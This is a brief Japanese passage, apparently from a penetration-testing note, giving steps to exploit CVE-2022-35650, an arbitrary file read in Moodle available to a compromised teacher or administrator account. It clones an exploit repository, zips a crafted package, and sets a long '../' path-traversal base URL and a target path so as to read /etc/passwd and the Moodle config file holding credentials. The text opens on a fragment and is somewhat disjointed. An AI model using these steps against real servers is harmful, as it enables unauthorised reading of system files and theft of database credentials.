
CVE-2022-35650(Moodleの任意ファイル読み取り)のエクスプロイト。
これはMoodleにおける任意のファイル読み取りです。
教師または管理者レベルのユーザーを侵害している必要があります。
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd)がダウンロードされることに注意してください。/etc/passwdの内容です。設定ファイル(お宝の認証情報付き)を読みたい場合は、imsmanifest.xml内のbaseurlを次のように設定します:
../../../../../../../../../../../var/www/html
そして、pool.dat内のimg srcを次のように設定します:
muc/config.php